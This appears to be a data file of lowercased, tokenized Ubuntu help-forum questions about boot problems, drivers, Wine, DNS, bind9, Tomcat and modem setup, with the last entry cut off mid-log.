422171	unable to install windows programs using wine in ubuntu 12.04 - program error	i am trying to install a couple windows programs , but it fails . i had wine 1.6 , so i thought maybe the latest version had some bugs . so , i uninstalled and re-installed 1.4 from the ubuntu repo , but the problem persists . i was trying to install meta trader 4 . i am running 12.04 lts 32 bit version of ubuntu . i have wine 1.4 installed . please see the screenshot . please help me .
422175	grub rescue because formatted ubuntu drive	i have pc with windows xp in c : \ and a week ago i installed ubuntu 5 to d : \ drive . since i had older version i formatted d : \drive . since then it is showing grub . i login using `` 'rootnoverify ( hd0,0 ) ' makeactive ' , 'chainloader +1 ' , 'boot ' '' . i 'm not able to boot through the cd because m*y dvd rom* is stopped working from then . i beleive that there is a problem in boot sector selection . how can i fix this ?
422179	telnet at login question	i am trying to setup a dummy terminal . the system automatically signs in as the user i want . the next step is for it to automatically telnet to a server . i have the autologin working and the system is going to the prompt . i have edited the .bash_profile to have the line `` telnet 10.0.0.1 '' the problem is the telnet is failing . i get the following at start up `` unable to connect to the remote host : network is unreachable . '' username @ hostname : ~ $ i can type at the prompt telnet 10.0.0.1 and it works fine . any ideas on how to get this to automatically telnet at startup ? i did as you suggested . i did make sure the network was set to the default connection . the system boots up and is still just going to the prompt and not running a telnet net session .
422183	multiple booting errors for 13.10	i have an acer aspire v5 touch , which came with windows 8 preinstalled . i removed it and installed ubuntu 13.10 in its place . at first the performance was great , much better than win8 and it booted up in under 20 seconds ( hdd not ssd ) . recently however , i have been experiencing very slow boot ups and i also see the grub menu a lot . i 'm guessing that 's due to some sort of startup issue . so i ran dmesg on the terminal , which returned the following : [ 810.306035 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:332 : i/o error writing to inode 35652078 ( offset 0 size 0 starting block 858265 ) [ 810.306039 ] sd 0:0:0:0 : [ sda ] unhandled error code [ 810.306040 ] sd 0:0:0:0 : [ sda ] [ 810.306041 ] result : hostbyte=did_ok driverbyte=driver_timeout [ 810.306042 ] sd 0:0:0:0 : [ sda ] cdb : [ 810.306042 ] write ( 10 ) : 2a 00 00 c1 52 40 00 00 08 00 [ 810.306046 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:332 : i/o error writing to inode 35652078 ( offset 0 size 0 starting block 1583689 ) [ 810.306050 ] sd 0:0:0:0 : [ sda ] unhandled error code [ 810.306051 ] sd 0:0:0:0 : [ sda ] [ 810.306051 ] result : hostbyte=did_ok driverbyte=driver_timeout [ 810.306052 ] sd 0:0:0:0 : [ sda ] cdb : [ 810.306053 ] write ( 10 ) : 2a 00 00 c1 6a 20 00 00 08 00 [ 810.306057 ] ext4-fs warning ( device sda1 ) : ext4_end_bio:332 : i/o error writing to inode 35652078 ( offset 0 size 0 starting block 1584453 ) [ 810.306063 ] sd 0:0:0:0 : [ sda ] unhandled error code [ 810.306064 ] sd 0:0:0:0 : [ sda ] [ 810.306065 ] result : hostbyte=did_ok driverbyte=driver_timeout [ 810.306066 ] sd 0:0:0:0 : [ sda ] cdb : [ 810.306066 ] write ( 10 ) : 2a 00 39 84 4d 88 00 00 a0 00 [ 810.306185 ] aborting journal on device sda1-8 . [ 810.306943 ] ext4-fs error ( device sda1 ) in ext4_reserve_inode_write:4849 : journal has aborted [ 810.307451 ] ext4-fs ( sda1 ) : remounting filesystem read-only [ 810.307454 ] ext4-fs error ( device sda1 ) : ext4_journal_check_start:56 : [ 810.307456 ] ext4-fs error ( device sda1 ) : ext4_journal_check_start:56 : detected aborted journal [ 810.307458 ] detected aborted journal i am completely clueless as i have not messed around with any of the hardware , or opened the back of the laptop or anything like that . all i did was install virtual box with a legitimate copy of windows 7 , if i ever need to use windows applications without the need of wine . if anyone can provide any solution to this , i would be very grateful . thank you in advance . edit : my laptop was shipped in uefi mode so i switched to legacy just to use ubuntu . but i will try what you suggested and let you know . thank you ! this is a fairly new laptop , from aug 2013 . edit : it has booted up but is ridiculously slow and does n't open firefox at all . edit : the file system was in read only so i ran fsck , which is fixing inodes from a corrupted orphan linked list , and deleted inodes which have zero dtime . there are a lot more things which were fixed . but luckily i have all of the data on the laptop backed up .
422185	terminal commands `` command not found ''	i 'm very new to ubuntu and having a few problems . i 'm trying to debrick my hp touchpad via the jc scullin wiki method , but when i 'm inputting a command in the terminal such as run '' cd downloads '' i just keep getting back ! command not found . is there something i 'm missing ? an install or different command ? just following the instructions provided for the process and starting to lose the plot .
422188	how to set hostnames to specific range of ip addresses on dhcp server ?	i 'm working on diskless linux clusters . i 'm using ubuntu server 12.04 ( dhcp , tftp and nfs servers installed and configured ) . when i boot slave machines via live cd , all of them have same hostname but different ip addresses . i want to set hostname/ip address pair to slave machines via dhcp server without knowing slaves mac addresses . for example : ip hostname 192.168.1.200 slave1 192.168.1.201 slave2 ... 192.168.1.253 slave54 when a slave machine dynamically get 192.168.1.201 ip address from dhcp server , its hostname must be slave2 . i used this solution on client side to get hostname from dhcp server . but i do n't know how to do this matching `` 192.168.1.201 slave2 '' on server side . my dhcp config file : ... subnet 192.168.1.0 netmask 255.255.255.0 { range dynamic-bootp 192.168.1.200 192.168.1.253 ; # range of lease ip address option broadcast-address 192.168.1.255 ; option routers 192.168.1.1 ; } next-server 192.168.1.10 ; # pxe server address filename âpxelinux.0â ; dhcp server dynamically assigns ip addresses to clients without knowing clients mac address . i think that it can assign hostnames too . is there a way to do that ? please give me any advice .
422198	gnu grub on boot 1.99-21ubuntu3.10	whenever i boot ubuntu it says something about gnu grub 1.99 . i have tried to do the solutions from other questions about the same problem , none have worked . i installed ubuntu with wubi , but i ca n't run wubi for some reason after the installation , so neither can i do repair options of that kind , currently i 'm using a live-cd to be able to run some commands , neither have any of those worked . please do not refer to any other of the since i have tried so many of them and they almost tell the same . i came across an answer about mount something but i do n't know which partition my ubuntu is installed on of those four . device boot start end blocks id system /dev/sda1 * 2048 401624 199788+ 7 hpfs/ntfs/exfat /dev/sda2 403456 452277944 225937244+ 7 hpfs/ntfs/exfat /dev/sda3 452278272 488183219 17952474 7 hpfs/ntfs/exfat /dev/sda4 488183808 488392064 104128+ c w95 fat32 ( lba ) does anybody have something i could try ?
422200	razer keyboard hacky work around ?	i 'm having serious compatibility issues with my razer keyboard , particularly if i type too quickly it misses keystrokes . razer has no linux drivers at the moment on their website , but i was wondering if anyone knows of any hacky work arounds ... even just pointing me towards an article i can read would be welcome . thanks . ( given how many open questions i see here about razer keyboards , i realize asking seems hopeless , but i hope for the best anyhow , thank you )
422201	kubuntu normal.mod not found on startup	i am pretty new to linux in general , so when errors come up i have no choice but to ask for help . anyway , i was attempting to install kubuntu on my laptop alongside windows 7 , and everything seemed to be going ok , at least until i shutdown after installing and rebooted . i got this error : error : file '/boot/grub2/i386-pc/normal.mod ' not found . entering rescue mode . '' i already tried reinstalling kubuntu , but that did n't work . help ?
422204	libs versions when cross compiling	i 'm trying to build an application . it requires the next libs : libev ( x86-32 ) libev ( x86-64 ) libev-devel ( x86-32 ) libev-devel ( x86-64 ) for ubuntu i run : sudo apt-get install libev-dev and get libev4 and libev-dev . but if i run sudo apt-get install libev-dev : i386 it wants to remove old libev . i need all these libraries to compile versions for different platforms . how to install them all ?
422208	connman missing from e17	i installed e17 using the ubuntu software center in my ubuntu 12.04 . when i logged into e17 and tried to connect into wireless , it was showing that connman was missing . how to fix the problem ?
422211	uninstall ubuntu13.10 in windows 7	how to remove ubuntu 13.10 from dual-boot win 7 , problem is i do n't know in which drive it is installed , may be same drive in which win 7 ?
422213	ubuntu - installing on a pendrive	is it possible to install ubuntu 13.10 on pendrive ? i do n't want a live ubuntu from unetbootin , because everytime i run live os all settings gone .
422217	grub not showing up ?	the grub boot menu is n't showing up when i turn on my computer . i have a dell computer with windows 8.1 and ubuntu 13.10 . my bios no longer shows windows boot manager ; it just shows ubuntu . i held shift but it did n't work . is windows gone ? what can i do ?
422218	update ubuntu server 12.04	i have an issue to update a ubuntu server 12.04 virtual machine , in the site i ca n't connect the virtual machine to the web , then , i have to download the updates and upload locally to the server but i donâ´t hnow where download this updates and how to upload to the ubuntu server for the installation . i hope you can help me and give me some ideas . thanks a lot .
422221	unable to login after modifying .profile	i am a fairly new ubuntu user . a few days ago i edited my ~/.profile and have spotted a syntax error in it . now , when i try to log on , it sends me back to the 'greeting screen ' after some errors . i do have a guest account , but no other accounts in the admin group . i 've been searching for a solution , but found nothing that has worked so far . here 's what i have already tried : launching root terminal from recovery mode in grub . when i tried to edit my .profile with nano/vi , it said that it was read-only . launching dpkg from recovery mode . this gave me an error saying the mount was terminated with status 32 . booting into single user mode . this gave me the same error as no . 2 ; mount was terminated with status 32 logging in with virtual terminal . i pressed ctrl+alt+f2 in greeting screen and logged in , but there was a login loop here too ; it would immediately ask for my login again after i logged in . any ideas ?
422223	ubuntu 13.10 : medion aykoya p6630 brighness changing issues	so i have tried a few things already with sudo gedit /etc/default/grub and changed the grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' and to some other things i do not remember . but right now it is back to the `` quiet splash '' . since i changed the grub_cmdline_linux= '' '' to grub_cmdline_linux= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' i can now at least change the brightness through the `` brightness & lock '' but the function ( fn ) keys do not work . at some point they at least gave the nice little animation of my screenbrightness changing , but that was when i was still dealing with the `` grub_cmdline_linux_default= '' line and i am not familliar with these things to know what to put up there to make the function keys working again . i hope someone can help me with that and if someone happend to know how i start the system with a certain brightness that would be nice to know . if you want to give me advice on what to do , then please be accurate in how i have to do it . i am new to ubuntu ; )
422225	issue with tomcat `` startup.sh '' file	i followed the steps as listed in `` how to install tomcat 7.0.42 on ubuntu 12.04.3 lts ? '' . it worked perfectly . but everytime to start tomcat server , i have to run this command in terminal `` sudo $ catalina_home/bin/startup.sh '' . i ca n't start it by double clicking on startup.sh file in bin folder . how to solve this problem ? # ! /bin/sh # licensed to the apache software foundation ( asf ) under one or more # contributor license agreements . see the notice file distributed with # this work for additional information regarding copyright ownership . # the asf licenses this file to you under the apache license , version 2.0 # ( the `` license '' ) ; you may not use this file except in compliance with # the license . you may obtain a copy of the license at # # http : //www.apache.org/licenses/license-2.0 # # unless required by applicable law or agreed to in writing , software # distributed under the license is distributed on an `` as is '' basis , # without warranties or conditions of any kind , either express or implied . # see the license for the specific language governing permissions and # limitations under the license . # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # start script for the catalina server # # $ id : startup.sh 1202062 2011-11-15 06:50:02z mturk $ # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # better os/400 detection : see bugzilla 31132 os400=false case `` `uname` '' in os400* ) os400=true ; ; esac # resolve links - $ 0 may be a softlink prg= '' $ 0 '' while [ -h `` $ prg '' ] ; do ls=`ls -ld `` $ prg '' ` link=`expr `` $ ls '' : ' . *- > \ ( . *\ ) $ '` if expr `` $ link '' : '/ . * ' > /dev/null ; then prg= '' $ link '' else prg=`dirname `` $ prg '' `/ '' $ link '' fi done prgdir=`dirname `` $ prg '' ` executable=catalina.sh # check that target executable exists if $ os400 ; then # -x will only work on the os400 if the files are : # 1. owned by the user # 2. owned by the primary group of the user # this will not work if the user belongs in secondary groups eval else if [ ! -x `` $ prgdir '' / '' $ executable '' ] ; then echo `` can not find $ prgdir/ $ executable '' echo `` the file is absent or does not have execute permission '' echo `` this file is needed to run this program '' exit 1 fi fi exec `` $ prgdir '' / '' $ executable '' start `` $ @ ''
422229	ubuntu server 13.10 canon pixma mx320 sane starts to scan and then fails with error during device i/o	the scanner works fine when plugged directly into my xubuntu laptop . then i had the brilliant idea that it would be nice to have it plugged into the server instead . i have followed this guide to set it up ( sharing a scanner over a network ) . after that , i can see the scanner over the network with scanimage -l but when i try to scan ( tried xsane , gscan2pdf , scanimage -t ) the scan starts , the scanner does some stuff , and then i get the device i/o error . this happens on the server itself and over the network . obviously , the first step would be to get it running just on the server , but i 'm not really sure what i 'm missing there . i get the same results when running as root . i have also tried this ( sharing canon all in one over network ) ( modification to /lib/udev/rules.d/50-udev-default.rules ) and this ( building a scan server on ubuntu server 12.04 ) ( added a rule for my scanner in /etc/udev/rules.d/90-scanner.rules )
422230	ubuntu 13.10 amd redeon hd 8750m open source drivers	i would like to give me a link to the amd open source drivers for my model ... as i can see in the title of the files i downloaded from amd.com , these drivers are proprietary.. any ideas ?
422236	i am considering changing to ubuntu from windows 8 .	will i still be able to use yahoo mail and google chrome if i switch ?
422238	set the launched application 's icons to be top , not side bar	i just recently started using ubuntu for things , other than the terminal . the side menu is pretty nice , however i am using 3-4 programs ( in the definition that they have an icon and appear on the side bar ) , so most of the space the task bar requires is not used . is there a way to have the icons on the top , where the clock , sound and email are ? some programs , like skype or spotify appear there . i want all programs to appear there and , if possible , to have icons by default and start the programs from there . is it possible ? if so , how ?
422243	how to audit tty for a specified user in ssh connection ?	i need a method to audit commands that a specified user type in an ssh connection to my server . any help ?
422244	network traffic reports as zero bytes	just installed ubuntu server 13.10 . i 'm in the middle of setting up some scripts that help me monitoring the server 's activity . now i find that the network traffic stays at zero bytes . here 's what i mean : /proc/net/dev says : @ boson : ~ $ cat /proc/net/dev inter-| receive | transmit face |bytes packets errs drop fifo frame compressed multicast|bytes packets errs drop fifo colls carrier compressed p17p1 : 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 lo : 1184 16 0 0 0 0 0 0 1184 16 0 0 0 0 0 0 for those wondering : @ boson : ~ $ lspci | grep ethernet 02:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) . @ boson : ~ $ uname -a linux boson 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux . @ boson : ~ $ cat /sys/class/net/p17p1/statistics/* 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 . @ boson : ~ $ netstat -i kernel interface table iface mtu met rx-ok rx-err rx-drp rx-ovr tx-ok tx-err tx-drp tx-ovr flg lo 65536 0 16 0 0 0 16 0 0 0 lru p17p1 1500 0 0 0 0 0 0 0 0 0 bmru . @ boson : ~ $ sudo lshw : *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : p17p1 version : 10 serial : bc:5f : f4 : ea:0e:28 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=full ip=10.0.1.220 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:51 memory : ff600000-ff63ffff ioport : e000 ( size=128 ) : the infamous alx module perhaps ? @ boson : ~ $ modinfo alx filename : /lib/modules/3.11.0-17-generic/kernel/drivers/net/ethernet/atheros/alx/alx.ko license : gpl description : qualcomm atheros ( r ) ar816x/ar817x pci-e ethernet network driver author : qualcomm corporation , < nic-devel @ qualcomm.com > author : johannes berg < johannes @ sipsolutions.net > srcversion : b18081bdfb465acd502d031 alias : pci : v00001969d000010a0sv*sd*bc*sc*i* alias : pci : v00001969d000010a1sv*sd*bc*sc*i* alias : pci : v00001969d00001090sv*sd*bc*sc*i* alias : pci : v00001969d0000e091sv*sd*bc*sc*i* alias : pci : v00001969d00001091sv*sd*bc*sc*i* depends : mdio intree : y vermagic : 3.11.0-17-generic smp mod_unload modversions any clues on how to get the counters working is welcome .
422245	can not download google chrome for ubuntu	is there something wrong with my setup , because when i try to download the 64-bit .deb from google the process just gets stuck ? the spinner spins , but nothing happens . does it work for you ?
422251	lenovo ideapad s510p install ubuntu 12.04	i bought an lenovo ideapad s510p . by default win8 was installed . i 've installed ubuntu 12.04 ( with secure boot it was a little bit of trouble : ) ) and all works fine but it starts really slow . inside the notebook its a 1tb hdd and 8gb ssd . i think win8 is installed on the ssd and the user files are on the hdd . how can i install ubuntu 12.04 new on the ssd and remove win8 ?
422252	vlc media player can not open video in ubuntu 12.04 lts	i have ubuntu 12.04 , i tried downloading the appropriate media player ( vlc ) , but i still ca n't watch any video content .
422253	why does 'disks ' utility mounting does not work ?	ubuntu , for some reason does not allow mounting drives through the 'disks ' utility . i went to more actions - > edit mount options - > mount at startup and pushed the check button , restarted the computer , and got a start up screen error message stating that there was an error mounting the drive `` press 's ' to skip '' , etc . i tried changing the options but it did n't work and i had to disable the automatic mount options .
422254	why are there so many console messages from gtk+ applications ?	i have tried to open software center using the command line software-center and it did worked . i mean , software center opened and works fine , but , at the same time , in the terminal window i see a lot of strange errors . how can that be ? i 'm puzzled . is there any explanation for this ( and a fix for it ) ? i repeat , the app does open and it works fine , is only the lines in the background that show that something is not all right . here are the screen-shots with all the lines .
422256	installing pecl pthreads	i want to try threads in php on my ubuntu 12.04 machine . i understand that i need zts support in php in order to use the pthreads pecl extension . i uninstalled php and built it from source with the -- enable-maintainer-zts option ( i also applied the suhosin patch ) . the php installation seems to be working ( i can run all my applications ) . the problem starts when i try to install pthreads . when i run `` pecl install pthreads '' i get the following error message : in file included from /tmp/pear/temp/pthreads/php_pthreads.c:238:0 : /tmp/pear/temp/pthreads/classes/thread.h : in function ‘zim_thread_kill’ : /tmp/pear/temp/pthreads/classes/thread.h:473:6 : error : ‘sigusr1’ undeclared ( first use in this function ) /tmp/pear/temp/pthreads/classes/thread.h:473:6 : note : each undeclared identifier is reported only once for each function it appears in in file included from /tmp/pear/temp/pthreads/php_pthreads.c:242:0 : /tmp/pear/temp/pthreads/classes/worker.h : in function ‘zim_worker_kill’ : /tmp/pear/temp/pthreads/classes/worker.h:380:6 : error : ‘sigusr1’ undeclared ( first use in this function ) i tried to manually add signal.h to php_pthreads.c , but that led to a whole bunch of other problems . so it seems like something is missing in my installation . does anybody have any ideas i can try ? edit : i 'm using php 5.3.9
422259	wireless mouse not working	i have a gigabyte wireless mouse ( m7600 ) , and ubuntu 13.10 freshly installed . all this on a dell inspiron n5110 . my problem is , that the mouse is n't responding . the system recognizes the receiver , it shows up as cypress corp.. if i issue lsusb . things i have tried so far : -trying it on windows 8.1 - > no effect -trying it on a live distributions - > no effect -trying it in each usb port - > no effect -trying it on an other computer - > working -trying other usb mice on this computer - > working -changing batteries - > no effect it worked for quite some time , and suddenly stopped working yesterday . any ideas ?
422264	how to debug dpkg configure error in subprocess post-installation ?	in short : i am trying to install spamassassin but dpkg returns only with : dpkg : error processing spamassassin ( -- configure ) : subprocess installed post-installation script returned error exit status 1 i have tried to find more information about what is going wrong but i can not find anywhere any useful logging . in /var/crash a spamassassin crashreport is generated but this gives only old dpkg errors and : start-date : 2014-02-17 19:18:13 commandline : apt-get install spamassassin aptordering : spamassassin : configure amavisd-new-postfix : configure followed by dmesg logging from startup . amavis gives an error because dependency spamassassin is not configured . i checked the log files : apt history.log apt term.log dpkg.log syslog.log but no additional information . i tried dpkg -d with all possible octals but i find nothing useful about what could go wrong . lots of questions and possible solutions have been written about dpkg errors and many i have tried , but with no additional information i do not have the feeling i am getting anywhere . surely there must be somewhere a possibility to read what is going wrong or to crank up some logging so it will be logged ?
422265	what is console-kit-daemon for ?	i am running ubuntu in console mode . do i need console-kit-daemon to be started ? what is it doing ? why is it necessary ? can i turn it off ? how can i turn it off ? and so on ...
422266	facing speech-dispatcher issue and system freeze after nouveau activation	i 'm facing an issue on ubuntu 12.04 with nouveau after complete removal of the nvidia driver . i did this for removal : sudo apt-get remove -- purge nvidia-* sudo rm /etc/x11/xorg.conf sudo apt-get install ubuntu-desktop echo 'nouveau ' | sudo tee -a /etc/modules and everything seemed to work fine . but when i start music player , open web browser and search through folders in nautilus i get kick off to this screen :
422267	missing some icons cinnamon installed on ubuntu 12.04.4	i installed cinnamon 2.0 and it is quite fast . i had to install the gnome icons , which took care of most missing icons except for a few like clementine . this is always a problem with certain programs with cinnamon going way back no matter if it installed with ubuntu or via mint . any ideas how to deal with this issue ? is it a theme issue ? can the issue be addressed with dconf or gconf ? any help would be greatly appreciated ! edit : this occurs only in the menu and taskbar . the clementine icon shows up in the sound settings and desktop .
422269	how to open or convert .gpk ( audio ) files ?	i wondering how i could open .gpk files ? these files were created by my digitech jamman loopstation . internet says wavelab , but this is not available for ubuntu , am i right ?
422276	difference between netinstall , hdmedia , and live install images on unetbootin ?	unetbootin comes with three different choices for ubunutu images : netinstall , hdmedia , and live . what 's the difference ?
422277	get qt webkit html content in qml	my application is built with qml ( ubuntu sdk ) , and i need to get the html content from a page loaded with a qt webview after the page is loaded . based on some initial research , it would appear that this used to be directly supported , but not anymore . i 'm using qt 5/qtwebkit 3 . how can i get the source from the page with javascript ? edit : i found out about the experimental object , but i 've still not found what i need . more here : http : //rschroll.github.io/beru/2013/08/21/qtwebview.experimental.html edit : just a broader perspective on what i 'm trying to do . my application attaches to a user 's freshbooks account through oauth . after they 've entered their credentials , i need to be able to access the oauth verifier code from the content of the page . via the oauth protocol , i do n't know of any other way to get this code . i ca n't even have the user copy-paste it over , because you ca n't select text in the webview : (
422284	how do i re-install zeitgeist datahub in the startup application preferences	i stupidly removed zeitgeist datahub from startup application preferences . how do i re-install it back there precisely as it was originally ? ? to put the question in another way : i did try to re-install it using the add button on startup application preferences , but then i was asked for a command ! i have no idea what that is or where to find it ! what is the command ? where do i find it ? more importantly , how do i find out if zeitgeist is even still installed in my system ? ? ? the reason i un-installed zeitgeist from my startup application preferences was because someone said it slowed the system down ; only later did i discover that unity dash will not work without it ! ! i use ubuntu 12.04 lts
422290	i just noticed i installed 64-bit system by mistake	i have a gateway m-6804m notebook with 3gb of ram https : //support.gateway.com/s/mobile/2007/tempest/1014839r/1014839rsp2.shtml i installed ubuntu with the windows installer about 2 weeks ago , but i did n't noticed until now , that it installed a 64-bit system instead of 32-bit system , now i 'm searching on many websites about the 64-bit system requirements ( including here ) , but what i 'm not sure is if it 's going to run faster if i install the 32-bit system because i 've read that with a 64-bit system will work harder than a 32-bit os . i 've noticed that sometimes when i play videos on youtube in low quality with an html5 player it runs slightly slow than my 32-bit windows 7 . i might try the 32-bit system , but i want to hear something from you before i do anything .
422292	running 12.04. system hangs after booting the new kernel	i created a custom patched kernel and after installing it using sudo dpkg -i , i get the messages that uimage , uinitrd and boot.scr have been backed up and created . however , in /boot , initrd.img.old and vmlinuz.old have not changed , although a new vmlinuz and initrd.img for the new kernel have been created . after manually correcting , i reboot and get : uncompressing linux ... done , booting the kernel . after which nothing happens . i find a lot of posts about this happening , but not really about a cause . does this mean that my custom kernel is either poor or poorly installed ? if so , how can i check ?
422293	remove isp-provided dns	my isp provides a dns service ; but unfortunately they do block certain sites . i would like to use opendns or google ; but it seems like it does n't work . i have set up a wired connection ; given a manual ip and entered opendns-ip 's in the nameserver field ( all through the gui ) . still url 's are being resolved through my isp . i have tried to configure the same on my girlfriends laptop ( win 7 ) and i also ca n't seem to do the setup . my previous computer also was a win 7 and had no problem . ( so i believe the problem is 'me ' ) if it were only one site , i could edit the hosts file ; but i prefere to circumvent their whole dns server . is there something an isp can do to block the use of other dns-servers than theirs ? is it possible to re-route the isp dns to the opendns ?
422297	ver . 12.04 64 bit boots very slowly	i installed this as a dual boot along side win xp . while it works fine , it takes about three minutes to boot , as compared to the windows boot at a minute or so . grub selection screen comes up right away but after selecting ubuntu , i sit and wait a long time . machine is amd 64 x2 athlon with 3 gb of memory .
422299	how does one add items to the `` send to '' menu in nautilus ?	you can add items to the create document right-click context menu by simply adding items to ~/templates . is there a similar method which allows you to add options to the send to context menu of nautilus , executing the proper script with the file name as a parameter ?
422301	the pc is not completing the restart process after installation 12.04	my pc was trying to restart to finish installation but it has hung midway through . the last message it shows is synchronising scsi cache . it 's the first reboot after installation of 12.04 .
422306	bind9 - where are all the references to update keys ?	i am testing bind9 9.9.3 intending to set it up with dhcp dynamic update . i followed this tutorial , but it did n't work uses this command to generate the key : /usr/sbin/rndc-confgen -a then i got to this one that uses longer keys and a different utility , dnssec-keygen i began with deleting the old key , which did n't work anyway , and now i have that in my syslog everytime i start the service : feb 17 20:58:47 rinoa named [ 930 ] : open : /etc/bind/rndc.key : file not found feb 17 20:58:47 rinoa named [ 930 ] : could n't add command channel 127.0.0.1 # 953 : file not found feb 17 20:58:47 rinoa named [ 930 ] : open : /etc/bind/rndc.key : file not found feb 17 20:58:47 rinoa named [ 930 ] : could n't add command channel : :1 # 953 : file not found of course i edited /etc/bind/named.config.local to look like this , after generating new key ( old one was rndc.key ) : key upd.key { algorithm hmac-md5 ; secret `` < secret follows > '' ; } ; zone `` domain.com '' { type master ; file `` /var/lib/bind/domain.com.hosts '' ; allow-update { key upd.key ; } ; } ; zone `` 192.168.99.in-addr.arpa '' { type master ; file `` /var/lib/bind/192.168.99.rev '' ; allow-update { key upd.key ; } ; } ; question : where do i look for any references to the old key name in order to get rid of them ?
422307	multiarch for armhf in ubuntu 13.10	can anyone guide me on how to set up my x86_64 ubuntu 13.10 for building armhf libraries and executables ? i have already installed g++-4.8-arm-linux-gnueabihf , gcc-4.8-arm-linux-gnueabihf and pkg-config-arm-linux-gnueabihf . and this allowed me to get the compilers ( /usr/bin/arm-linux-gnueabihf-g++-4.8 and /usr/bin/arm-linux-gnueabihf-gcc-4.8 ) for building stuff , but now i want to set up the system in order to install the libraries that i need with the dependencies ( like uuid-dev : armhf for example ) . so i run dpkg -- add-architecture armhf and i modify the source lists and update , like so : deb [ arch=amd64 ] http : //fr.archive.ubuntu.com/ubuntu/ saucy main restricted deb [ arch=armhf ] http : //ports.ubuntu.com/ubuntu-ports saucy main restricted apt-get update but when i try to install uuid-dev : armhf , i have unmet dependencies , and i do n't know how to solve the problem . the following packages have unmet dependencies : uuid-dev : armhf : depends : libc6-dev : armhf but it is not going to be installed or libc-dev : armhf depends : libuuid1 : armhf ( = 2.20.1-5.1ubuntu9 ) but it is not going to be installed
422312	help to install modem smart link ltd. lm-i56n ( rev 02 )	i have ubuntu 12.4 and modem smart link ltd. lm-i56n ( rev 02 ) it not work scanmodem modemdata only plain text email is forwarded by the discuss @ linmodems.org list server , as html can contain viruses . use as the email subject line : yourname , yourcountry kernel 3.11.0-15-generic with this subject line cogent experts will be alerted , and useful case names left in the archive . yourcountry will enable country specific guidance . linux experts in yourcountry can be found through they will know your country 's modem code , which may be essential for dialup service . responses from discuss @ linmodems.org are sometimes blocked by an internet provider mail filters . so in a day , also check the archived responses at -- -- -- -- -- -- -- -- -- -- -- -- -- system information -- -- -- -- -- -- -- -- -- -- -- -- -- -- cpu=i686 , ubuntu , alsa_version=k3.11 . linux version 3.11.0-15-generic ( buildd @ akateko ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 25~precise1-ubuntu smp thu jan 30 17:42:40 utc 2014 scanmodem update of : 2011_08_08 distrib_id=ubuntu distribcodename=precise aptrepositorystem= presently install your linux distributions dkms package . it provides for automated driver updates , following upgrade of your kernel . for details see there are no blacklisted modem drivers in /etc/modprobe* files potentially useful modem drivers now loaded are : snd_atiixp_modem snd_via82xx_modem snd_intel8x0m snd_hda_intel attached usb devices are : id 12d1:1003 huawei technologies co. , ltd. e220 hsdpa modem / e230/e270/e870 hsdpa/hsupa modem if a cellphone is not detected , see /t-878554.html a sample report is : if a usb modem or cellphone is attached and was not detected , please provide available information in your request to discuss @ linmodems.org candidate pci devices with modem chips are : 04:02.0 modem : smart link ltd. lm-i56n ( rev 02 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) high definition audio cards can host modem chips . for candidate card in slot 04:02.0 , firmware information and bootup diagnostics are : pci slot pci id subsystemid name -- -- -- -- -- -- -- -- -- - -- -- -- -- - -- -- -- -- -- -- -- 04:02.0 2003:8800 16ef:2800 modem : smart link ltd. lm-i56n modem interrupt assignment and sharing : 18 : 0 0 0 0 io-apic-fasteoi uhci_hcd : usb4 -- - bootup diagnostics for card in pci slot 04:02.0 -- -- [ 0.136209 ] pci 0000:04:02.0 : [ 2003:8800 ] type 00 class 0x070300 [ 0.136226 ] pci 0000:04:02.0 : reg 0x10 : [ mem 0xfa000000-0xfaffffff pref ] [ 0.136300 ] pci 0000:04:02.0 : pme # supported from d3hot d3cold for candidate card in slot 00:1b.0 , firmware information and bootup diagnostics are : pci slot pci id subsystemid name -- -- -- -- -- -- -- -- -- - -- -- -- -- - -- -- -- -- -- -- -- 00:1b.0 8086:27d8 1458 : a002 audio device : intel corporation nm10/ich7 family high definition audio controller modem interrupt assignment and sharing : 44 : 1784 162 159 158 pci-msi-edge snd_hda_intel -- - bootup diagnostics for card in pci slot 00:1b.0 -- -- [ 0.124480 ] pci 0000:00:1b.0 : [ 8086:27d8 ] type 00 class 0x040300 [ 0.124495 ] pci 0000:00:1b.0 : reg 0x10 : [ mem 0xfdff8000-0xfdffbfff 64bit ] [ 0.124560 ] pci 0000:00:1b.0 : pme # supported from d0 d3hot d3cold [ 0.124618 ] pci 0000:00:1b.0 : system wakeup disabled by acpi [ 7.959480 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 8.049352 ] input : hda intel front headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input3 [ 8.049617 ] input : hda intel line out side as /devices/pci0000:00/0000:00:1b.0/sound/card0/input4 [ 8.049700 ] input : hda intel line out clfe as /devices/pci0000:00/0000:00:1b.0/sound/card0/input5 [ 8.049790 ] input : hda intel line out surround as /devices/pci0000:00/0000:00:1b.0/sound/card0/input6 [ 8.049878 ] input : hda intel line out front as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 8.049965 ] input : hda intel line as 